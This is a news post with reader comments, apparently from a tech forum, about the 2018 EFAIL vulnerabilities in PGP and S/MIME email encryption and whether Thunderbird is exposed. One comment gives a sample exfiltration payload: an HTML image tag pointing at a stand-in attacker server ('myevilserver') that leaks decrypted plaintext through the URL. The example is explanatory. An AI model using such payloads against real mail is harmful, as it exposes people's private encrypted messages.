Ars Technica is reporting that there are
critical PGP and S/MIME bugs which can reveal encrypted e-mails. Their advice is to uninstall the plugins, for the time being. More information will be released tomorrow (Tuesday at 07:00 UTC, 3:00 AM EDT, midnight PDT).
Little is publicly known about the flaws at the moment. Both Schinzel and the EFF blog post said they will be disclosed late Monday night California time in a paper written by a team of European security researchers. Schinzel's Twitter messages used the hashtag #efail, a possible indication of the name the researchers have given to their exploit.
The EFF also published a warning, Attention PGP Users: New Vulnerabilities Require You To Take Action Now:
A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.
The full details will be published in a paper on Tuesday at 07:00 AM UTC (3:00 AM Eastern, midnight Pacific). In order to reduce the short-term risk, we and the researchers have agreed to warn the wider PGP user community in advance of its full publication.
The EFF also gives additional advice on disabling PGP in Thunderbird with Enigmail as well as other mail and mail-like clients.
takyon: The embargo is broken and the full details, including the paper (PDF), have been published.
(Score: 2, Insightful) by Anonymous Coward on Monday May 14 2018, @01:36PM (6 children)
Thunderbird will not load remote content by default. You have to explicitly ask it to do so. Since the exploit relies on loading a remote image with a url containing your plaintext, thunderbird will not fail you here.
(Score: 0) by Anonymous Coward on Monday May 14 2018, @02:31PM (1 child)
Thank you for giving a nice, easy to understand, once sentence description of the issue. It amazes me that no one, not even the summary nor editor, were able to simply summarize the issue.
(Score: 4, Insightful) by choose another one on Monday May 14 2018, @03:05PM
> It amazes me that no one, not even the summary nor editor, were able to simply summarize the issue.
That simple summary relies on information not publicly known at the time of the submission or the editing.
Editor would have required a time machine to be able to simply summarize the issue, and if you have a time machine any encryption is probably moot anyway.
(Score: 2) by Apparition on Monday May 14 2018, @04:04PM (3 children)
Uhh... According to this chart [imgur.com], Thunderbird gets owned by EFAIL pretty hard.
(Score: 0) by Anonymous Coward on Monday May 14 2018, @05:33PM (2 children)
Then whoever created the chart does not understand the bug, or is just fearmongering. Thunderbird will not load external resources by default. The bug only works if you load an external resource. Therefore, Thunderbird is not vulnerable.
Exploit example given:
<img src="http://myevilserver/
---BEGIN GPG MESSAGE---
---END GPG MESSAGE---
">
You get the above in the mail, with the html inserted by Mallory. Enigmail automatically decrypts the message and you end up with an img url:
<img src="http://myevilserver/secret%20meeting%209pm">
If Thunderbird were then to load this image, and it will do so only if you tell it to, then Mallory's evilserver will get a request containing your secret meeting details. It is understandable, of course, that some people would give permission to load the image when they see nothing in the body of the email except a broken image placeholder. You might also say that the bug creates a broken email that appears to be authenticated, so the user may decide that his friend actually intended to send him an image, rather than text. In either case, the plaintext is not leaked automatically, but only as a result of explicitly clicking on "Allow" button and selecting "myevilserver" as allowed. The fact that many people would do this does not make Thunderbird or Enigmail directly vulnerable any more than normal phishing attacks in a plaintext email.
(Score: 2) by HiThere on Monday May 14 2018, @05:50PM (1 child)
Are you sure? My copy of Thunderbird doesn't load remote images by default, but I set it up a long time ago, and re-install have used the same preferences. I'm rather sure that when I set it up I explicitly told it not to load remote images, and that this required changing a default setting. Of course, that was over a decade ago now, so the defaults may have changed.
Javascript is what you use to allow unknown third parties to run software you have no idea about on your computer.
(Score: 0) by Anonymous Coward on Monday May 14 2018, @06:28PM
See https://support.mozilla.org/en-US/kb/remote-content-in-messages [mozilla.org]